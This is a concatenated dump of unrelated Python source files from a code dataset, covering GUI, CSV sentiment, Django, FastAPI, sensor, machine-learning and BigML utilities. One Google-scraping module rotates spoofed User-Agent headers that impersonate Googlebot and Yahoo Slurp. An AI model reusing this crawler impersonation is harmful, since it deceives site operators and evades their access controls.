pos_x + radius, pos_y + radius), fill=color)\r\n switch = switch.resize((switch.width // SCALE, switch.height // SCALE), resample=Image.LANCZOS)\r\n return Texture(name=str(uuid4()), image=switch)\r\n\r\n def render(self):\r\n color_true = self.style_attr('color_true')\r\n bg_color_true = self.style_attr('bg_color_true')\r\n self._true_texture = self._render_toggle(True, color_true, bg_color_true)\r\n\r\n color_false = self.style_attr('color_false')\r\n bg_color_false = self.style_attr('bg_color_false')\r\n self._false_texture = self._render_toggle(False, color_false, bg_color_false)\r\n\r\n self.set_proper_texture()\r\n","sub_path":"env/lib/python3.8/site-packages/arcade/gui/elements/toggle.py","file_name":"toggle.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"446616262","text":"import csv\nimport requests\nfrom requests import HTTPError\nimport json\nfrom config import api_config\nimport config\nimport io\nimport codecs\n\n\nclass CSVFile:\n\n def __init__(self, file_path, delimiter, quotechar=None):\n self.file_path = file_path\n self.fieldnames = None\n self.delimiter = str(delimiter) if delimiter else ','\n self.quotechar = quotechar\n\n self.api_url = api_config['server_ip'] + api_config['resource']\n if quotechar:\n self.csv_data = self.__load_csv__(file_path=self.file_path, delimiter=self.delimiter, quotechar=self.quotechar)\n else:\n self.csv_data = self.__load_csv__(file_path=self.file_path, delimiter=self.delimiter)\n\n if len(self.csv_data) < 1:\n raise ValueError('CSV has 1> rows.')\n\n def has_column(self, column_name):\n return True if column_name in self.fieldnames else False\n\n def __load_csv__(self, file_path, delimiter, encoding='utf-8', **kwargs):\n if not delimiter:\n delimiter = ','\n\n encodings = ['utf-8', 'mac_roman', 'mac_latin2', 'cp865', 'latin_1', 'cp1251']\n\n try:\n with io.open(file_path, 'r', encoding=encoding) as csvfile:\n reader = csv.DictReader(csvfile, delimiter=delimiter, **kwargs)\n\n self.fieldnames = reader.fieldnames\n return tuple(reader)\n except UnicodeDecodeError:\n encoding = encodings[encodings.index(encoding)+1]\n return self.__load_csv__(file_path, delimiter, encoding=encoding, **kwargs)\n\n def __get_splits__(self, call_limit=4000):\n row_count = len(self.csv_data)\n\n # Partition all the calls in 10000 items each (to avoid HTTP 413)\n for each_split in range(0, row_count, call_limit):\n yield self.csv_data[each_split:each_split + call_limit]\n\n def calculate_sentiment(self, column_name):\n new_file = []\n\n\n for data_partition in self.__get_splits__():\n\n texts = [row[column_name] for row in data_partition]\n\n req = json.dumps(dict(data=texts))\n r = requests.post(self.api_url, data=req)\n # Only do this, if the status code is OK\n if r.status_code == 200:\n payload = r.json()\n predictions = payload['data']\n # Zip the original data with the new predictions\n for org_dict, new_dict in zip(data_partition, predictions):\n new_dict.pop('text')\n org_dict.update(new_dict)\n\n six_way_subset = self.get_dict_subset(org_dict, config.chart_config['sentiment_types'])\n org_dict['winning_emotion'] = self.get_winning_emotion(six_way_subset)\n org_dict['winning_emotion_score'] = self.get_winning_emotion_score(six_way_subset)\n\n new_file.append(org_dict)\n else:\n raise HTTPError('Got status code {0}'.format(str(r.status_code)))\n self.csv_data = new_file\n\n return new_file\n\n def get_dict_subset(self, d1, key_subset):\n return {k: d1[k] for k in key_subset}\n\n def get_winning_emotion(self, prediction_dict):\n return max(prediction_dict, key=prediction_dict.get)\n\n def get_winning_emotion_score(self, prediction_dict):\n return max(prediction_dict)\n\n def save(self):\n # Get the column names and add new columns (e.g. angry, joy, animated)\n self.fieldnames += [column for column in self.csv_data[0].keys() if column not in self.fieldnames]\n # Write the file to the same file again\n with open(self.file_path, 'w') as csvfile:\n\n # Quick fix for csv module (Can't handle kwargs as None, e.g. 
quotechar=None)\n if self.quotechar:\n writer = csv.DictWriter(csvfile, delimiter=self.delimiter, quotechar=self.quotechar,\n fieldnames=self.fieldnames)\n else:\n writer = csv.DictWriter(csvfile, delimiter=self.delimiter, fieldnames=self.fieldnames)\n\n writer.writeheader()\n writer.writerows(self.csv_data)\n\n\nclass CSVFilePlot(CSVFile):\n\n def __init__(self, filepath, delimiter, chart_type, quotechar=None):\n super().__init__(filepath, delimiter, quotechar=quotechar)\n self.chart_type = chart_type\n\n\n def get_plot_data(self):\n pass\n\n\n\nimport unittest\n\nclass TestCSVFile(unittest.TestCase):\n\n def setUp(self):\n self.path = 'test-file.csv'\n\n def test(self):\n csv_file = CSVFile(file_path=self.path, delimiter=',')\n\n csv_file.calculate_sentiment('comment')\n csv_file.save()\n\n def test_load_csv(self):\n c = CSVFile(file_path=self.path, delimiter=',')\n self.assertIsNotNone(c.file_path)\n self.assertIsNotNone(c.csv_data)\n self.assertEqual(type(c.csv_data), tuple)\n for each in c.csv_data:\n print(each)\n self.assertEqual(type(each), dict)\n\n def test___get_splits__(self):\n c = CSVFile(file_path=self.path, delimiter=',')\n print(list(c.__get_splits__()))\n\n def test_calculate_sentiment(self):\n c = CSVFile(file_path=self.path, delimiter=',')\n a = c.calculate_sentiment('comment')\n for each in a:\n print(each)\n","sub_path":"src/models/csv_file.py","file_name":"csv_file.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"284368392","text":"import csv\nimport itertools\nimport shutil\nfrom PySimpleGUI import OneLineProgressMeter as progress\nfrom screen import frame\nfrom os import chdir, listdir, mkdir\nfrom platform import system\nfrom datetime import datetime\n\n\nclass MoveCSV:\n def __init__ (self, user_input):\n self.csv = str(user_input[0])\n self.files_path = str(user_input[1])\n self.csv_itens = None\n self.file_list = None\n self.file_listex = None\n self.user_os = None\n self.os_separator = None\n self.moved_dir = None\n\n def os_name(self):\n os_name = system()\n self.os_separator = '/'\n# if ('Windows' in os_name):\n # self.os_separator = '\\\\'\n # elif ('Darwin' in os_name) or ('Linux' in os_name):\n # self.os_separator = '/'\n # else:\n # self.os_separator = '\\\\'\n\n \n def get_list_files(self):\n chdir(self.files_path)\n self.file_list = listdir()\n\n def file_extension_remove(self):\n file_listex = []\n for file in self.file_list:\n if '.' in file:\n file_without_ext = file.rsplit('.', 1)\n file_listex.append(file_without_ext[0])\n else:\n file_listex.append(file)\n self.file_listex = file_listex\n\n def mkdir_moved(self):\n try:\n chdir(self.files_path)\n now = datetime.now()\n dir_name = str('MOVIDO-' + now.strftime(\"%H%M%S\"))\n mkdir(dir_name)\n self.moved_dir = dir_name\n except:\n print(\"Não foi possivel criar pasta para mover os arquivos\")\n \n def read_csv(self):\n print(\"files path: \",self.csv,\"\\nos separatou: \",self.os_separator)\n csv_path, csv_name = self.csv.rsplit(self.os_separator, 1)\n chdir(csv_path)\n csv_itens = list(itertools.chain.from_iterable(csv.reader(open(csv_name))))\n self.csv_itens = csv_itens\n \n def move_files(self):\n files_to_move = []\n current_file = 0\n chdir(self.files_path)\n for item in self.csv_itens:\n for file in self.file_list:\n if item in file:\n files_to_move.append(file)\n\n for file in files_to_move:\n current_file += 1\n if current_file < len(files_to_move):\n progress('Momento Arquivos', current_file, len(self.file_list), 'single')\n\n full_path_file = self.files_path + self.os_separator + file\n full_path_file_moved = self.files_path + self.os_separator + self.moved_dir + self.os_separator + file\n shutil.move(full_path_file, full_path_file_moved)\n\n \n\n\nuser_input = frame()\napp = MoveCSV(user_input)\napp.os_name()\napp.get_list_files()\napp.file_extension_remove()\napp.mkdir_moved()\napp.read_csv()\napp.move_files()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"80166952","text":"from ..models import Station\nfrom rest_framework.renderers import TemplateHTMLRenderer\nfrom django_filters.views import FilterView\nfrom django import forms\nimport django_filters\nfrom django.contrib.gis import geos\nfrom django.contrib.gis import measure\n\n\n\n\nACTIVE = 'ACTIVE'\nINACTIVE = 'INACTIVE'\nMAINTENANCE = 'MAINTENANCE'\nSTATUS_CHOICES = (\n (ACTIVE, 'active'),\n (INACTIVE, 'inactive'),\n (MAINTENANCE, 'maintenance'),\n)\n\n\n\n\n\nclass StationMapFilter(django_filters.FilterSet):\n current_status = django_filters.MultipleChoiceFilter(choices=STATUS_CHOICES, widget=forms.CheckboxSelectMultiple)\n longitude = django_filters.NumberFilter(widget=forms.NumberInput)\n latitude = django_filters.NumberFilter(widget=forms.NumberInput)\n\n class Meta:\n model = Station\n fields = ['current_status', 'longitude', 'latitude']\n\n\nclass StationMapView(FilterView):\n renderer_classes = [TemplateHTMLRenderer]\n template_name = 'station_map.html'\n filterset_class = StationMapFilter\n context_object_name = 'stations'\n model = Station\n\n\n def get_queryset(self, *args, **kwargs):\n query = Station.objects.all()\n if self.kwargs:\n if self.kwargs['current_status']:\n query = Station.objects.filter(category=self.kwargs['current_status'])\n\n if self.kwargs['longitude'] and self.kwargs['latitude']:\n longitude = self.kwargs['longitude']\n latitude = self.kwargs['longitude']\n current_point = geos.fromstr(\"POINT(%s %s)\" % (longitude, latitude))\n distance_from_point = {'km': 10}\n query = query.gis.filter(location__distance_lte=(current_point, measure.D(**distance_from_point)))\n query = query.distance(current_point).order_by('distance')\n return query\n","sub_path":"src/water_watch_project/water_watch_api/views/station_map_view.py","file_name":"station_map_view.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"316008619","text":"import logging\nfrom datetime import datetime\n\nfrom fastapi import APIRouter\n\nfrom app.Replicator import replicate_message\nfrom app.models.message import MessageOut, MessageIn\nfrom app.msg_list import MsgList\n\nrouter = APIRouter()\nmsg_list = MsgList()\nlogger = logging.getLogger(__name__)\n\n\n@router.get(\"/status\")\nasync def status():\n return {\"status\": \"OK\"}\n\n\n@router.get(\"/list_msg\")\nasync def list_msg():\n return msg_list.get_messages()\n\n\n@router.get(\"/list_size\")\nasync def list_size():\n return {\"list size\": len(msg_list.get_messages())}\n\n\n@router.post(\"/append_msg\", status_code=201, response_model=MessageOut)\nasync def append_msg(msg: MessageIn):\n message = MessageOut(message=msg.message, created_at=str(datetime.utcnow()))\n msg_list.add_msg(message)\n await replicate_message(message)\n return message\n","sub_path":"master/app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"30035015","text":"import http.cookiejar\nimport os\nimport time\nimport urllib.request, urllib.parse, urllib.error\nimport urllib.request, urllib.error, urllib.parse\nimport urllib.parse\nimport socket\nimport urllib.error\nfrom random import randint\n\ntry:\n import bs4 as BeautifulSoup\nexcept ImportError:\n import BeautifulSoup\n\n# URL templates to make Google searches.\nurl_search = \"http://www.google.%(domain)s/search?hl=%(language)s&q=%(search_query)s&btnG=Google+Search\"\nurl_next_page = \"http://www.google.%(domain)s/search?hl=%(language)s&q=%(search_query)s&start=%(start)d\"\n\n# Sites to block\nblocked = [\n \"http://www.youtube.com\",\n \"http://www.blogger.com\"\n]\n\nuser_agents = [\n \"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5)\",\n \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\",\n \"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)\",\n \"Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)\",\n \"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\",\n \"Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14\",\n \"Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02\",\n \"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101213 Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01\",\n \"Opera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60\"\n]\n\n# Cookie jar. Stored at the user's home folder.\nhome_folder = os.getenv('HOME')\nif not home_folder:\n home_folder = os.getenv('USERHOME')\n if not home_folder:\n home_folder = '.' # Use the current folder on error.\ncookie_jar = http.cookiejar.LWPCookieJar(os.path.join(home_folder, '.google-cookie'))\n\ntry:\n cookie_jar.load()\nexcept Exception:\n pass\n\ndef get_page(url):\n \"\"\"\n Gets a page from url\n \"\"\"\n request = urllib.request.Request(url)\n request.add_header(\"User-Agent\", user_agents[randint(0, len(user_agents) - 1)])\n cookie_jar.add_cookie_header(request)\n\n got_result = 0\n while not(got_result):\n try:\n responce = urllib.request.urlopen(request)\n got_result = 1\n except urllib.error.HTTPError as e:\n print(\"The server couldn't fulfill the request.\")\n print('Error code: ', e.code)\n exit(0)\n except urllib.error.URLError as e:\n print(\"Failed to reach a server\")\n print(\"Reason: \", e.reason)\n ans = input(\"Do you want to try again? 
(\\\"y\\\" or \\\"n\\\"): \")\n if (ans != \"y\"):\n exit(0)\n\n cookie_jar.extract_cookies(responce, request)\n html = responce.read()\n responce.close()\n cookie_jar.save()\n return html\n\ndef parse_result_stats(stats):\n \"\"\"\n Parse result stats and get a string of results quantity\n \"\"\"\n stat = stats.get_text()\n result_list = stat.split()\n if (\"About\" in result_list):\n return result_list[1]\n if (\"result\" or \"results\" in result_list):\n return result_list[0]\n return \"\"\n\ndef convert_int(str_in):\n '''\n Convert str to int\n '''\n if (len(str_in) == 0):\n return 0\n number = 0\n for i in range(len(str_in)):\n if (str_in[i] >= '0' and str_in[i] <= '9'):\n number *= 10\n number += int(str_in[i])\n return number\n\ndef cast_result(link, filetype= \"\"):\n try:\n for blocked_site in blocked:\n if (link.startswith(blocked_site)):\n return None\n\n o = urllib.parse.urlparse(link, 'http')\n if o.netloc and 'google' not in o.netloc:\n return link\n\n # Decode hidden URLs.\n if link.startswith('/url?'):\n link = urllib.parse.parse_qs(o.query)['q'][0]\n\n # Valid results are absolute URLs not pointing to a Google domain\n # like images.google.com or googleusercontent.com\n o = urllib.parse.urlparse(link, 'http')\n if o.netloc and 'google' not in o.netloc:\n if (filetype == \"pdf\" and link.endswith(filetype) == False):\n return None\n return link\n except Exception:\n pass\n return None\n\ndef search(query, tld = \"com\", lang = \"en\", pause = 2.0, filetype = \"pdf\"):\n \"\"\"\n Gets links from google search\n \"\"\"\n # Hashes are used to avoid repeated results\n hashes = set()\n\n # Preparing the search string\n if (filetype == ''):\n query = urllib.parse.quote_plus(query)\n else:\n query = urllib.parse.quote_plus(query + \" filetype:\" + filetype)\n\n search_url = url_search % {\"domain\" : tld, \"language\" : lang, \"search_query\" : query}\n\n html = get_page(search_url)\n\n soup = BeautifulSoup.BeautifulSoup(html)\n stats = soup.find(id = \"resultStats\")\n stat = parse_result_stats(stats)\n if (stat == \"\"):\n print(\"No results were found!\")\n print(\"Exiting...\")\n exit(0)\n results = input(\"Found about {0} results.\\nHow much to process? (0 - EXIT): \".format(stat))\n results = convert_int(results)\n if (results > convert_int(stat)):\n results = convert_int(stat)\n \n results_found = 0\n links = []\n start = 0\n while (results_found < results):\n time.sleep(pause)\n soup = BeautifulSoup.BeautifulSoup(html)\n\n anchors = soup.findAll(\"a\")\n for a in anchors:\n try:\n link = a[\"href\"]\n except KeyError:\n continue\n\n link = cast_result(link, filetype = \"pdf\")\n if not link:\n continue\n\n h = hash(link)\n if (h in hashes):\n continue\n hashes.add(h)\n\n if (results_found < results):\n links.append(link)\n results_found += 1\n else:\n break\n start = results_found\n search_url = url_next_page % {\"domain\" : tld, \"language\" : lang, \"search_query\" : query, \"start\" : start}\n time.sleep(pause)\n html = get_page(search_url)\n return links\n\nif __name__ == \"__main__\":\n import sys\n print(search(query = sys.argv[1], pause = 0.5))","sub_path":"google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":6567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"267168300","text":"from datetime import datetime\nfrom keys import weatherapikey, location # weatherapi.com\nimport requests, json, pylaxz\nimport Adafruit_DHT as ada\nfrom gpiozero import InputDevice as in_device\n\n\n\nclass NewData:\n def __init__(self, update_location=False, debug=False):\n self.debug = debug\n\n self.rain = in_device(18).is_active\n self.location = location if not update_location else self.update_loca()\n self.url = 'http://api.weatherapi.com/v1/current.json?key='+weatherapikey+'&q='+self.location\n self.get_weather()\n\n def get_temp(self):\n if self.debug:\n pylaxz.printf('get_temp: getting h & t ... ', _int=1)\n return ada.read_retry(ada.DHT11, 4)\n\n def update_loca(self):\n lat = input('lat: ')\n lon = input('lon: ')\n return lat+','+lon\n\n def get_weather(self):\n res = requests.get(url=self.url)\n self.weather = json.loads(res.text)['current']\n\n def get(self):\n new_data = list()\n h, t = None, None\n\n new_data.append(str(datetime.now())) # 0\n if self.debug:\n pylaxz.printf('sensors: date ... done.')\n\n h, t = self.get_temp()\n new_data.append(t) # 1\n new_data.append(h) # 2\n\n if self.debug:\n if h and t is not None:\n pylaxz.printf('sensors: HT ... done.', _int=1) \n else:\n pylaxz.printf('sensors: HT sensors error.', _int=1, _err=1)\n\n new_data.append(0) if self.rain else new_data.append(1) # 3\n if self.debug:\n pylaxz.printf('sensors: is_raining ... done.', _int=1)\n\n new_data.append(self.weather['temp_c']) # 4\n new_data.append(self.weather['humidity']) # 5\n new_data.append(self.weather['wind_kph']) # 6\n\n if self.debug:\n pylaxz.printf('sensors: weather data ... done', _int=1)\n\n # new_data.append('--Decision--') # 7\n\n if self.debug:\n pylaxz.printf('sensors: all done.', _int=1)\n\n return new_data\n","sub_path":"rpi-devs/datacollector.py","file_name":"datacollector.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"541401377","text":"# Purpose: Explore Random Forest Classification\n\n# reference https://chrisalbon.com/machine_learning/trees_and_forests/random_forest_classifier_example/\n\n\nfrom __future__ import print_function\nfrom sklearn.datasets import load_iris\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import metrics\nimport pandas as pd\nimport numpy as np\nnp.random.seed(0)\n\niris = load_iris()\ndf = pd.DataFrame(iris.data, columns = iris.feature_names)\nprint(\"df.head():\", df.head())\n\ndf['species'] = pd.Categorical.from_codes(iris.target, iris.target_names)\n\nprint(\"iris.target:\", iris.target)\nprint(\"iris.target_names:\", iris.target_names)\n\ndf['is_train'] = np.random.uniform(0, 1, len(df)) <= 0.75\n\ntrain, test = df[df['is_train'] == True], df[df['is_train'] == False]\n\nprint(\"len(train): \", len(train))\nprint(\"len(test): \", len(test))\n\nfeatures = df.columns[:4]\nprint(\"features:\", features)\n\ny = pd.factorize(train['species'])[0]\nprint(\"y:\", y)\n\nclf = RandomForestClassifier(n_jobs = 2, random_state = 0)\nclf.fit(train[features], y)\n\nprint(\"clf.predict(test[features]):\", clf.predict(test[features]))\n\nprint(\"clf.predict(test[features]):\", clf.predict(test[features]))\n\npreds = iris.target_names[clf.predict(test[features])]\n\nprint(\"confusion matrix:\")\nprint(pd.crosstab(\n test['species'], \n preds, \n rownames = ['Actual Species'], \n colnames = ['Predicted Species']))\n\nprint(\"list(zip(train[features], clf.feature_importances_)):\", list(zip(train[features], clf.feature_importances_)))","sub_path":"randomforestplay.py","file_name":"randomforestplay.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"511001381","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n#\n# Copyright 2012 BigML\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"A class to deal with the fields of a resource.\n\nThis module helps to map between ids, names, and column_numbers in the\nfields of source, dataset, or model. Also to validate your input data\nfor predictions or to list all the fields from a resource.\n\nfrom bigml.api import BigML\nfrom bigml.fields import Fields\n\napi = BigML()\n\nsource = api.get_source(\"source/50a6bb94eabcb404d3000174\")\nfields = Fields(source['object']['fields'])\n\ndataset = api.get_dataset(\"dataset/50a6bb96eabcb404cd000342\")\nfields = Fields(dataset['object']['fields'])\n\n# Note that the fields in a model come one level deeper\nmodel = api.get_model(\"model/50a6bbac035d0706db0008f8\")\nfields = Fields(model['object']['model']['fields'])\n\nprediction = api.get_prediction(\"prediction/50a69688035d0706dd00044d\")\nfields = Fields(prediction['object']['fields'])\n\n\n\"\"\"\nimport sys\nimport locale\n\nfrom bigml.util import invert_dictionary, map_type\nfrom bigml.util import DEFAULT_LOCALE\nfrom bigml.util import python_map_type, find_locale\n\n\nclass Fields(object):\n \"\"\"A class to deal with BigML auto-generated ids.\n\n \"\"\"\n def __init__(self, fields, missing_tokens=[''],\n data_locale=DEFAULT_LOCALE, verbose=False):\n\n find_locale(data_locale, verbose)\n\n self.fields = fields\n self.fields_by_name = invert_dictionary(fields, 'name')\n self.fields_by_column_number = invert_dictionary(fields,\n 'column_number')\n self.missing_tokens = missing_tokens\n\n def field_id(self, key):\n \"\"\"Returns a field id.\n\n \"\"\"\n\n if isinstance(key, basestring):\n try:\n id = self.fields_by_name[key]\n except KeyError:\n sys.exit(\"Error: field name '%s' does not exist\" % key)\n return id\n elif isinstance(key, int):\n try:\n id = self.fields_by_column_number[key]\n except KeyError:\n sys.exit(\"Error: field column number '%s' does not exist\" %\n key)\n return id\n\n def field_name(self, key):\n \"\"\"Returns a field name.\n\n \"\"\"\n if isinstance(key, basestring):\n try:\n name = self.fields[key]['name']\n except KeyError:\n sys.exit(\"Error: field id '%s' does not exist\" % key)\n return name\n elif isinstance(key, int):\n try:\n name = self.fields[self.fields_by_column_number[key]]['name']\n except KeyError:\n sys.exit(\"Error: field column number '%s' does not exist\" %\n key)\n return name\n\n def field_column_number(self, key):\n \"\"\"Returns a field column number.\n\n \"\"\"\n try:\n return self.fields[key]['column_number']\n except KeyError:\n return self.fields[self.fields_by_name[key]]['column_number']\n\n def len(self):\n \"\"\"Returns the number of fields.\"\n\n \"\"\"\n return len(self.fields)\n\n def pair(self, row, headers=None,\n objective_field=None, objective_field_present=None):\n \"\"\"Pairs a list of values with their respective field ids.\n\n objective_field is the column_number of the objective field.\n\n 
`objective_field_present` must be True is the objective_field column\n is present in the row.\n\n \"\"\"\n\n if objective_field is None:\n objective_field = sorted(self.fields_by_column_number.keys())[-1]\n\n fields_names = [self.fields[self.field_id(i)]['name'] for i in\n sorted(self.fields_by_column_number.keys())\n if i != objective_field]\n\n pair = {}\n\n if headers:\n if not isinstance(objective_field, basestring):\n objective_field = self.field_name(objective_field)\n if objective_field_present is None:\n objective_field_present = objective_field in headers\n for index in range(len(row)):\n if index < len(row) and not row[index] in self.missing_tokens:\n if (objective_field_present and\n headers[index] == objective_field):\n continue\n field = self.fields[self.fields_by_name[headers[index]]]\n row[index] = self.strip_affixes(row[index], field)\n try:\n pair.update({headers[index]:\n map_type(field['optype'])(row[index])})\n except:\n message = (u\"Mismatch input data type in field \"\n u\"\\\"%s\\\" for value %s. The expected \"\n u\"fields are: \\n%s\" %\n (field['name'],\n row[index],\n \",\".join(fields_names))).encode(\"utf-8\")\n raise Exception(message)\n else:\n if isinstance(objective_field, basestring):\n objective_field = self.field_column_number(objective_field)\n if objective_field_present is None:\n objective_field_present = len(row) == self.len()\n column_numbers = sorted(self.fields_by_column_number.keys())\n index = 0\n for column_number in column_numbers:\n if index < len(row) and not row[index] in self.missing_tokens:\n if column_number == objective_field:\n if objective_field_present:\n index += 1\n continue\n\n field = self.fields[self.field_id(column_number)]\n row[index] = self.strip_affixes(row[index], field)\n try:\n pair.update({self.field_id(column_number):\n map_type(field['optype'])(row[index])})\n except:\n message = (u\"Mismatch input data type in field \"\n u\"\\\"%s\\\" for value %s. 
The expected \"\n u\"fields are: \\n%s\" %\n (field['name'],\n row[index],\n \",\".join(fields_names))).encode(\"utf-8\")\n raise Exception(message)\n index += 1\n\n return pair\n\n def list_fields(self, out=sys.stdout):\n \"\"\"Lists a description of the fields.\n\n \"\"\"\n for field in [(val['name'], val['optype'], val['column_number'])\n for key, val in sorted(self.fields.items(),\n key=lambda k:\n k[1]['column_number'])]:\n out.write('[%-32s: %-16s: %-8s]\\n' % (field[0],\n field[1], field[2]))\n out.flush()\n\n def validate_input_data(self, input_data, out=sys.stdout):\n \"\"\"Validates whether types for input data match types in the\n fields definition.\n\n \"\"\"\n if isinstance(input_data, dict):\n for name in input_data:\n if name in self.fields_by_name:\n out.write('[%-32s: %-16s: %-16s: ' %\n (name, type(input_data[name]),\n self.fields[self.fields_by_name[name]]\n ['optype']))\n if (type(input_data[name]) in\n python_map_type(self.fields[self.fields_by_name[name]]\n ['optype'])):\n out.write('OK\\n')\n else:\n out.write('WRONG\\n')\n else:\n out.write(\"Field '%s' does not exist\\n\" % name)\n else:\n out.write(\"Input data must be a dictionary\")\n\n def strip_affixes(self, value, field):\n \"\"\"Strips prefixes and suffixes if present\n\n \"\"\"\n value = unicode(value, \"utf-8\")\n if 'prefix' in field and value.startswith(field['prefix']):\n value = value[len(field['prefix']):]\n if 'suffix' in field and value.endswith(field['suffix']):\n value = value[0:-len(field['suffix'])]\n return value\n","sub_path":"bigml/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":9049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"420588738","text":"# https://www.hackerrank.com/challenges/py-if-else/problem\ns = ''\n\nn = int(input())\n\nif n % 2 == 1:\n s = 'Weird'\nelif n <= 4 or n > 20:\n s = 'Not Weird'\nelse:\n s = 'Weird'\n\nprint(s)\n\n","sub_path":"9/lab/hackerrank/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"255299431","text":"a = int(input(\"Enter a number: \"))\nb = int(input(\"Enter second number: \"))\n\nprint(\"1.Addition \\n2.Substraction \\n3.Multiplication \\n4.Division\")\n\nc = int(input(\"Enter yor choice: \"))\n\nif c == 1:\n d = a + b\nelif c == 2:\n d = a - b\nelif c == 3:\n d = a * b\nelif c == 4:\n d = a / b\nelse:\n print(\"Wrong Input\")\n \n\nprint(\"The answer is: \", d)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"134364857","text":"# -*- coding: utf-8 -*-\nimport pyaudio\nimport wave\nimport numpy\n\n\ndef RecordAudioInFile(CHANNELS,RECORD_SECONDS, WAVE_OUTPUT_FILENAME = \"mfcc.wav\"):\n p = pyaudio.PyAudio()\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n RATE = 44100\n stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK)\n print(\"Recording...\")\n frames = []\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n print(\"Done recording\")\n stream.stop_stream()\n stream.close()\n p.terminate()\n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n\ndef GetRecordAudio(CHANNELS,RECORD_SECONDS):\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n RATE = 44100\n p = pyaudio.PyAudio()\n stream = p.open(format=FORMAT, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK)\n print(\"Recording...\")\n frames = []\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n print(\"Done recording\")\n stream.stop_stream()\n stream.close()\n p.terminate()\n return numpy.fromstring(numpy.asarray(frames), dtype=numpy.int16)\n\n\n","sub_path":"AudioBytes.py","file_name":"AudioBytes.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
